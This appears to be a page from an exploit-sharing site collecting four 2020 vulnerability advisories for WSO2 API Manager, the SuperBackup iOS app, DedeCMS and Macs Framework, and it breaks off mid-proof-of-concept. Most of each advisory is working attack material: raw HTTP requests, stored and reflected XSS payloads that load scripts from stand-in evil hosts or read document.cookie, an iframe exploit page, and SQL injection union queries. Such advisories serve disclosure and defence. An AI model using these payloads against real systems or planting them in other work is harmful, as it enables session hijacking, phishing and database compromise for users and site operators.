HireHackking

# Title: WSO2 3.1.0 - Persistent Cross-Site Scripting # Date: 2020-04-13 # Author: raki ben hamouda # Vendor: https://apim.docs.wso2.com # Softwrare link: https://apim.docs.wso2.com/en/latest/ # CVE: N/A # Advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700 Technical Details & Description: ================================ A remote Stored Cross Site Scripting has been discovered in WSO2 API Manager Ressource Browser component). The security vulnerability allows a remote attacker With access to the component "Ressource Browser" to inject a malicious code in Add Comment Feature. The vulnerability is triggered after sending a POST request to `/carbon/info/comment-ajaxprocessor.jsp` with Parameter "comment=targeted&path=%2F". Remote attackers has the ablility to spread a malware,to Hijack a session (a session with Higher privileges), or to initiate phishing attacks. The security risk of the Stored XSS web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.4 Exploitation of the Stored XSS web vulnerability requires a low privilege web-application user account and medium or high user interaction. Successful exploitation of the vulnerability results in Compromising the server . Request Method: [+] POST Module: [+] /carbon/info/comment-ajaxprocessor.jsp Parameters: [+] comment=admincomment [+] path=%2F ======================================= POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1 Host: 192.168.149.1:9443 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/ X-Requested-With: XMLHttpRequest, XMLHttpRequest X-Prototype-Version: 1.5.0 Content-type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH Content-Length: 64 Cookie: region3_registry_menu=visible; region3_metadata_menu=none; wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e; JSESSIONID=4B3AB3AA8895F2897685FA98C327D521; requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=registry_menu%252Cresource_browser_menu%2523 Connection: close comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F ============================== HTTP/1.1 200 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: DENY vary: accept-encoding Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Tue, 31 Dec 2019 10:50:00 GMT Connection: close Server: WSO2 Carbon Server Content-Length: 3144 //the body of response includes attacker malicious script <a class="closeButton icon-link registryWriteOperation" onclick="delComment('/','/;comments:33')" id="closeC0" title="Delete" style="background-image: url(../admin/images/delete.gif);position:relative;float:right">&nbsp;</a> <iframe href=http://phishing_url> <br/> posted on 0m ago (on Tue Dec 31 11:50:00 GMT+01:00 2019) by attacker Proof of Concept (PoC): ======================= //Let's suppose we're Attacking an admin with higher privileges 1-Attacker opens his account 2-add arbitrary comment 3-intercepts the request 4-add malicious script to the comment 5-admin access his account,he wants to add a comment,the malicious script got executed ===>Admin account compromised =============================================================================== Example malicious script : <script> alert(document.cookie); </script> ===============================================================================

# Title: SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting # Author: Vulnerability Laboratory # Date: 2020-04-15 # Vendor: http://dropouts.in/ # Software Link: https://apps.apple.com/us/app/super-backup-export-import/id1052684097 # CVE: N/A Document Title: =============== SuperBackup v2.0.5 iOS - (VCF) Persistent XSS Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2202 Release Date: ============= 2020-04-15 Vulnerability Laboratory ID (VL-ID): ==================================== 2202 Common Vulnerability Scoring System: ==================================== 4.6 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Backup all your iPhone or iPad contacts in 1 tap and export them. Fastest way to restore contacts from PC or Mac. Export by mailing the backed up contacts file to yourself. Export contacts file to any other app on your device. Export all contacts directly to your PC / Mac over Wifi, no software needed! Restore any contacts directly from PC / Mac. Restore contacts via mail. Get the ultimate contacts backup app now. (Copy of the Homepage: https://apps.apple.com/us/app/super-backup-export-import/id1052684097 ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent cross site web vulnerabilities in the official SuperBackup v2.0.5 ios mobile application. Affected Product(s): ==================== Dropouts Technologies LLP Product: Super Backup v2.0.5 Vulnerability Disclosure Timeline: ================================== 2020-04-15: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Pre auth - no privileges User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A persistent cross site scripting web vulnerability has been discovered in the official SuperBackup v2.0.5 ios mobile application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise the mobile web-application from the application-side. The cross site scripting web vulnerabilities are located in the `newPath`, `oldPath` & `filename` parameters of the vcf listing module. Remote attackers are able to inject own malicious persistent script codes as vcf filename to the main index list. The request method to inject is POST and the attack vector of the vulnerability is located on the application-side. The injection point is located at the vcf filename or import. The execution point occurs in the main index list after the import or insert. Remote attackers are able to inject own script codes to the client-side requested vulnerable web-application parameters. The attack vector of the vulnerability is persistent and the request method to inject/execute is POST. The vulnerabilities are classic client-side cross site scripting vulnerabilities. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] VCF Vulnerable Parameter(s): [+] newPath (path - vcf filename) [+] oldPath (path - vcf filename) Proof of Concept (PoC): ======================= The cross site scripting vulnerability can be exploited by remote attackers without privileged user account and with low user interaction. For security demonstration or to reproduce the cross site scripting vulnerability follow the provided information and steps below to continue. PoC: Payload (Filename) >"<iframe%20src=evil.source%20onload=alert("PWND")></iframe> PoC: Vulnerable Source (Listing - Index) <button type="button" class="btn btn-default btn-xs button-download"> <span class="glyphicon glyphicon-download-alt"></span> </button> </td> <td class="column-name"><p class="edit" title="Click to rename...">Contacts 09:17:12:PM 10:Apr.:2020 .vcf</p></td> <td class="column-size"> <p>26.40 KB</p> </td> <td class="column-delete"> <button type="button" class="btn btn-danger btn-xs button-delete"> <span class="glyphicon glyphicon-trash"></span> </button> </td> </tr></tbody></table> </div> PoC: Exception-Handling Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 .vcf" to "/Contacts >"<iframe src=evil.source onload=alert("PWND")></iframe> 09:17:12:PM 10:Apr.:2020 .vcf" - Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 .vcf" to "/Contacts 09:17:12:PM 10:Apr.:2020 >"<iframe src=evil.source onload=alert("PWND")></iframe> .vcf" - Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 .vcf" to "/Contacts >"<iframe src=evil.source onload=alert("PWND")></iframe>09:17:12:PM 10:Apr.:2020 .vcf" PoC: Exploit BEGIN:VCARD VERSION:3.0 PRODID:-//Apple Inc.//iPhone OS 12.4.5//EN B:Kunz Mejri ;>"<iframe src=evil.source onload=alert("PWND")></iframe> ;;; END:VCARD --- PoC Session Logs [POST] --- http://localhost/move Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 187 Origin: http://localhost Connection: keep-alive Referer: http://localhost/ oldPath=/Contacts 09:17:12:PM 10:Apr.:2020 .vcf&newPath=/evil-filename>"<iframe src=evil.source onload=alert("PWND")></iframe>.vc - POST: HTTP/1.1 500 Internal Server Error Content-Length: 593 Content-Type: text/html; charset=utf-8 Connection: Close Server: GCDWebUploader - http://localhost/evil.source Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://localhost/ - GET: HTTP/1.1 200 OK Server: GCDWebUploader Connection: Close Solution - Fix & Patch: ======================= 1. Parse and filter the vcf name values next to add, edit or imports to prevent an execution 2. Restrict and filter in the index listing the vcf names to sanitize the output Security Risk: ============== The security risk of the persistent vcf cross site scripting web vulnerability is estimated as medium. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Title: DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting # Author: Vulnerability Laboratory # Date: 2020-04-15 # Vendor Link: http://www.dedecms.com # Software Link: http://www.dedecms.com/products/dedecms/downloads/ # CVE: N/A Document Title: =============== DedeCMS v7.5 SP2 - Multiple Persistent Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2195 Release Date: ============= 2020-04-09 Vulnerability Laboratory ID (VL-ID): ==================================== 2195 Common Vulnerability Scoring System: ==================================== 4.3 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Welcome to use the most professional PHP website content management system in China-Zhimeng content management system, he will be your first choice for easy website building. Adopt XML name space style core templates: all templates are saved in file form, which provides great convenience for users to design templates and website upgrade transfers. The robust template tags provide strong support for webmasters to DIY their own websites. High-efficiency tag caching mechanism: Allows the caching of similar tags. When generating HTML, it helps to improve the reaction speed of the system and reduce the resources consumed by the system. (Copy of the homepage: http://www.dedecms.com/products/dedecms/downloads/) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the official DedeCMS v5.7 SP2 (UTF8) web-application. Affected Product(s): ==================== DesDev Inc. Product: DedeCMS - Content Management System v5.7 SP2 Vulnerability Disclosure Timeline: ================================== 2020-04-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted authentication (user/moderator) - User privileges User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ Multiple persistent cross site scripting vulnerabilities has been discovered in the official DedeCMS v5.7 SP2 UTF8 web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent script code inject web vulnerabilities are located in the `activepath`, `keyword`, `tag`, `fmdo=x&filename`, `CKEditor` and `CKEditorFuncNum`parameters of the `file_pic_view.php`, `file_manage_view.php`, `tags_main.php`, `select_media.php`, `media_main.php` files. The attack vector of the vulnerability is non-persistent and the request method to inject is POST. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules. Request Method(s): [+] POST Vulnerable File(s): [+] file_pic_view.php [+] file_manage_view.php [+] tags_main.php [+] select_media.php [+] media_main.php Vulnerable Parameter(s): [+] tag [+] keyword [+] activepath [+] fmdo=move&filename & fmdo=edit&filename [+] CKEditor & CKEditor=body&CKEditorFuncNum Proof of Concept (PoC): ======================= The web vulnerabilities can be exploited by remote attackers with privileged user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Request: Examples https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%2Fuploads https://test23.localhost:8080/dede/tags_main.php?tag=&orderby=total&orderway=desc https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=2&langCode=en PoC: Payload ".>"<img>"%20<img src=[Evil.Domain]/[Evil.Source].* onload=alert(document.domain)> >"%20<"<img="" src="https:/www.vulnerability-lab.com/gfx/logo-header.png onload=alert(document.domain)"> >"><iframe src=evil.source onload=alert(document.domain)> %22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E %3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E %3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E PoC: Exploitation <title>DedeCMS v5.7 SP2 UTF8 - Multiple Non Persistent XSS PoCs</title> <iframe src="https://test23.localhost:8080/dede/file_pic_view.php?activepath=%2Fuploads%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E"> <iframe src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E&activepath=%2Fuploads"> <iframe src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E"> <iframe src="https://test23.localhost:8080/dede/tags_main.php?tag=pwnd&orderway=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E"> <iframe src="https://test23.localhost:8080/dede/tags_main.php?tag=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E&orderby=1&orderway="> <iframe src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=>"><iframe src=evil.source onload=alert(document.domain)>body&CKEditorFuncNum=2&langCode=en"> <iframe src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=>"><iframe src=evil.source onload=alert(document.domain)>2&langCode=en"> ... --- PoC Session Logs [POST] --- (Some Examples ...) https://test23.localhost:8080/dede/media_main.php Host: test23.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 152 Origin: https://test23.localhost:8080 Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE= Connection: keep-alive Referer: https://test23.localhost:8080/dede/media_main.php Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958; DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f; ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php keyword=>"%20<<img src=https://[Evil.Domain]/[Evil.Source].png>&mediatype=0&membertype=0&imageField.x=23&imageField.y=4 - POST: HTTP/2.0 200 OK server: nginx content-type: text/html; charset=utf-8 content-length: 1830 expires: Thu, 19 Nov 1981 08:52:00 GMT pragma: no-cache cache-control: private set-cookie: ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php; expires=Mon, 06-Apr-2020 17:53:23 GMT; Max-Age=3600; path=/ vary: Accept-Encoding content-encoding: gzip x-powered-by: PHP/5.6.40, PleskLin X-Firefox-Spdy: h2 --- https://test23.localhost:8080/dede/file_pic_view.php ?activepath=%2Fuploads%2F>" <"<img+src%3Dhttps%3A%2F%2Fwww.vulnerability-lab.com%2Fgfx%2Flogo-header.png>&imageField.x=0&imageField.y=0 Host: test23.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE= Connection: keep-alive Referer: https://test23.localhost:8080/dede/file_pic_view.php?activepath=&imageField.x=0&imageField.y=0 Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958; DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f; ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php%3Fdopost%3Dfilemanager Upgrade-Insecure-Requests: 1 - GET: HTTP/2.0 200 OK server: nginx content-type: text/html; charset=utf-8 x-powered-by: PHP/5.6.40 expires: Thu, 19 Nov 1981 08:52:00 GMT pragma: no-cache cache-control: private X-Firefox-Spdy: h2 --- https://test23.localhost:8080/include/dialog/select_media.php? CKEditor=>"><iframe src=evil.source onload=alert("1")>body&CKEditorFuncNum=>"><iframe src=evil.source onload=alert("2")>2&langCode=en Host: test23.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE= Connection: keep-alive Cookie: PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958; DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f; ENV_GOBACK_URL=%2Fdede%2Ffeedback_main.php Upgrade-Insecure-Requests: 1 - GET: HTTP/2.0 200 OK server: nginx content-type: text/html; charset=utf-8 content-length: 1137 expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache vary: Accept-Encoding content-encoding: gzip x-powered-by: PHP/5.6.40, PleskLin X-Firefox-Spdy: h2 Reference(s): https://test23.localhost:8080/dede/media_main.php https://test23.localhost:8080/dede/tags_main.php https://test23.localhost:8080/dede/file_pic_view.php https://test23.localhost:8080/dede/file_manage_view.php https://test23.localhost:8080/include/dialog/select_media.php Solution - Fix & Patch: ======================= 1. Parse the content to disallow html / js and special chars on the affected input fields 2. Restrict the vulnerable paramter prevent injects via post method request 3. Secure the output location were the content is insecure sanitized delivered as output Security Risk: ============== The security risk of the application-side persistent cross site scripting web vulnerabilities in the different modules are estimated as medium. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ --

# Title: Macs Framework 1.14f CMS - Persistent Cross-Site Scripting # Author: Vulnerability Laboratory # Date: 2020-04-15 # Software Link: https://sourceforge.net/projects/macs-framework/files/latest/download # CVE: N/A Document Title: =============== Macs Framework v1.14f CMS - Multiple Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2206 Release Date: ============= 2020-04-14 Vulnerability Laboratory ID (VL-ID): ==================================== 2206 Common Vulnerability Scoring System: ==================================== 7.4 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== Macs CMS is a Flat File (XML and SQLite) based AJAX Content Management System. It focuses mainly on the Edit In Place editing concept. It comes with a built in blog with moderation support, user manager section, roles manager section, SEO / SEF URL. https://sourceforge.net/projects/macs-framework/files/latest/download (Copy of the Homepage: https://sourceforge.net/projects/macs-framework/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Macs Framework v1.1.4f CMS. Affected Product(s): ==================== Macrob7 Product: Macs Framework v1.14f - Content Management System Vulnerability Disclosure Timeline: ================================== 2020-04-14: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Authentication Type: ==================== Restricted authentication (user/moderator) - User privileges User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ 1.1 & 1.2 Multiple non-persistent cross site scripting web vulnerabilities has been discovered in the official Mac Framework v1.1.4f Content Managament System. The vulnerability allows remote attackers to manipulate client-side browser to web-applicatio requests to compromise user sesson credentials or to manipulate module content. The first vulnerability is located in the search input field of the search module. Remote attackers are able to inject own malicious script code as search entry to execute the code within the results page that is loaded shortly after the request is performed. The request method to inject is POST and the attack vector is located on the client-side with non-persistent attack vector. The second vulnerability is located in the email input field of the account reset function. Remote attackers are able to inject own malicious script code as email to reset the passwort to execute the code within performed request. The request method to inject is POST and the attack vector is located on the client-side with non-persistent attack vector. Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected or connected application modules. Request Method(s): [+] POST Vulnerable Parameter(s): [+] searchString [+] emailAdress 1.3 Multiple remote sql-injection web vulnerabilities has been discovered in the official Mac Framework v1.1.4f Content Managament System. The vulnerability allows remote attackers to inject or execute own sql commands to compromise the dbms or file system of the application. The sql injection vulnerabilities are located in the `roleId` and `userId` of the `editRole` and `deletUser` module. The request method to inject or execute commands is GET and the attack vector is located on the application-side. Attackers with privileged accounts to edit are able to inject own sql queries via roleid and userid on deleteUser or editRole. Multiple unhandled and broken sql queries are visible as default debug to output for users as well. Exploitation of the remote sql injection vulnerability requires no user interaction and a privileged web-application user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. Request Method(s): [+] POST Vulnerable Module(s): [+] deleteUser [+] editRole Vulnerable Parameter(s): [+] userId [+] roleId Proof of Concept (PoC): ======================= Google Dork(s): intitle, subtitle & co. Site Powered by Mac's PHP MVC Framework Framework of the future Design downloaded from Zeroweb.org: Free website templates, layouts, and tools. 1.1 The non-persistent cross site scripting web vulnerability can be exploited by remote attackers without user account and with low user interaction. For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue. PoC: Payload >">"<iframe src=evil.source onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0 PoC: Vulnerable Source <form method="post" action="https://macs-cms.localhost:8080/index.php/search" id="searchForm"> <span class="searchLabel">Search Site:</span><input type="searchString" value="" name="searchString" class="searchString"> <input type="submit" value="Search" class="searchSubmit"> </form><br> <span class="error">No Results found for: "<iframe src="evil.source" onload="alert(document.cookie)"></span> --- PoC Session Logs [POST] --- https://macs-cms.localhost:8080/index.php/search Host: macs-cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 112 Origin: https://macs-cms.localhost:8080 Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE= Connection: keep-alive Referer: https://macs-cms.localhost:8080/index.php Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; Upgrade-Insecure-Requests: 1 searchString=>">"<iframe src=evil.source onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0 - POST: HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Content-Length: 9865 1.2 The non-persistent cross site scripting web vulnerability can be exploited by remote attackers without user account and with low user interaction. For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue. PoC: Exploitation test"<iframe src=evil.source onload=alert(document.cookie)>@gmail.com PoC: Vulnerable Source <form method="post" action="https://macs-cms.localhost:8080/index.php/main/cms/login" class="ajax" ajaxoutput="#loginMessage"> <table style="width:100%"> <tbody><tr> <td style="width: 20px">Username:</td> <td><input type="text" name="username"></td> </tr> <tr> <td>Password:</td> <td><input type="password" name="password"></td> </tr> <tr> <td colspan="2"><input type="submit" value="Login"></td> </tr> <tr> <td colspan="2"><br><div id="loginMessage" style="display: block;">Invalid Username or Password</div></td> </tr> </tbody></table> <br> <a href="https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword" class="ajax" ajaxoutput="#forgotPassword">Forgot Password</a> <input type="hidden" name="scrollPosition" value="102"></form> <div id="forgotPassword" style="display: block;"> <form class="ajax" method="post" action="https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess" ajaxoutput="#forgotPasswordReturn"> Enter your email address: <input type="text" name="emailAddress"><br> <input type="submit" value="Send Email"> </form> <br> <div id="forgotPasswordReturn" style="display: block;">Cannot find user with Email address: test"<iframe src=evil.source onload=alert(document.cookie)>@gmail.com</iframe></div> </div> --- PoC Session Logs [POST] --- https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword Host: macs-cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 17 Origin: https://macs-cms.localhost:8080 Connection: keep-alive Referer: https://macs-cms.localhost:8080/index.php/main/cms/login Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; ajaxRequest=true - POST: HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Content-Length: 335 - https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess Host: macs-cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 123 Origin: https://macs-cms.localhost:8080 Connection: keep-alive Referer: https://macs-cms.localhost:8080/index.php/main/cms/login Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; ajaxRequest=true&=&emailAddress=test"<iframe src=evil.source onload=alert(document.cookie)>@gmail.com - POST: HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Content-Length: 105 1.3 The remote sql injection web vulnerability can be exploited by remote attackers with privileged application user account and without user interaction. For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue. PoC: Payload %27-1%20order%20by%205-- %27-1%20union select 1,2,3,4,@@version-- PoC: Exploitation <html> <head><body><title>Mac's CMS SQL Injection PoC</title> <iframe 